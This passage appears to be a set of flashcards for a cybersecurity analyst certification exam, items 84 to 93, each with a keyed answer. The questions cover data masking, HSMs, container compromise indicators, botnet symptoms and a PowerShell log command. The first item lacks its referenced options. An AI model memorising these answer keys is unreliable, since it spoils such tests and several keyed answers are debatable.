Which of the following is the order of priority for risk mitigation from highest to lowest?

A. A, B, C, D
B. A, D, B, C
C. B, C, A, D
D. C, B, D, A
E. D, A, C, B

A

B. A, D, B, C

85
Q

The Chief Information Officer (CIO) of a large healthcare institution is concerned about all machines having direct access to sensitive patient information. Which of the following should the security analyst implement to BEST mitigate the risk of sensitive data exposure?

A. A cloud access service broker system
B. NAC to ensure minimum standards are met
C. MFA on all workstations
D. Network segmentation

A

D. Network segmentation

86
Q

A Chief Information Security Officer (CISO) is concerned developers have too much visibility into customer data. Which of the following controls should be implemented to BEST address these concerns?

A. Data masking
B. Data loss prevention
C. Data minimization
D. Data sovereignty

A

A. Data masking

87
Q

A security analyst is supporting an embedded software team. Which of the following is the BEST recommendation to ensure proper error handling at runtime?

A. Perform static code analysis
B. Require application fuzzing
C. Enforce input validation
D. Perform a code review

A

B. Require application fuzzing

88
Q

Which of the following MOST accurately describes an HSM?

A. An HSM is a low-cost solution for encryption
B. An HSM can be network-based or a removable USB
C. An HSM is slower at encrypting than software
D. An HSM is explicitly used for MFA

A

B. An HSM can be network-based or a removable USB

89
Q

A company is moving from the use of web servers hosted in an internal datacenter to a containerized cloud platform. An analyst has been asked to identify indicators of compromise in the containerized environment. Which of the following would BEST indicate a running container has been compromised?

A. A container from an approved software image has drifted
B. An approved software orchestration container is running with root privileges
C. A container from an approved software image has stopped responding
D. A container from an approved software image fails to start

A

A. A container from an approved software image has drifted

90
Q

A cybersecurity analyst is investigating a potential incident affecting multiple systems on a company's internal network. Although there is a negligible impact to performance, the following symptoms are present on each of the affected systems:
✑ Existence of a new and unexpected svchost.exe process
✑ Persistent, outbound TCP/IP connections to an unknown external host with routine keep-alives transferred
✑ DNS query logs showing successful name resolution for an Internet-resident dynamic DNS domain
If this situation remains unresolved, which of the following will MOST likely occur?

A. The affected hosts may participate in a coordinated DDoS attack upon command
B. An adversary may leverage the affected hosts to reconfigure the company's router ACLs
C. Key files on the affected hosts may become encrypted and require ransom payment for unlock
D. The adversary may attempt to perform a man-in-the-middle attack

A

A. The affected hosts may participate in a coordinated DDoS attack upon command

91
Q

Massivelog.log has grown to 40GB on a Windows server. At this size, local tools are unable to read the file, and it cannot be moved off the virtual server where it is located. Which of the following lines of PowerShell script will allow a user to extract the last 10,000 lines of the log for review?

A. tail -10000 Massivelog.log > extract.txt
B. info tail n -10000 Massivelog.log | extract.txt;
C. get content './Massivelog.log' -Last 10000 | extract.txt
D. get-content './Massivelog.log' -Last 10000 > extract.txt;

A

D. get-content './Massivelog.log' -Last 10000 > extract.txt;

92
Q

Which of the following are components of the intelligence cycle? (Choose two.)

A. Collection
B. Normalization
C. Response
D. Analysis
E. Correction
F. Dissension

A

A. Collection

D. Analysis

93
Q

A financial institution's business unit plans to deploy a new technology in a manner that violates existing information security standards. Which of the following actions should the Chief Information Security Officer (CISO) take to manage any type of violation?

A. Enforce the existing security standards and controls
B. Perform a risk analysis and qualify the risk with legal
C. Perform research and propose a better technology
D. Enforce the standard permits

A

B. Perform a risk analysis and qualify the risk with legal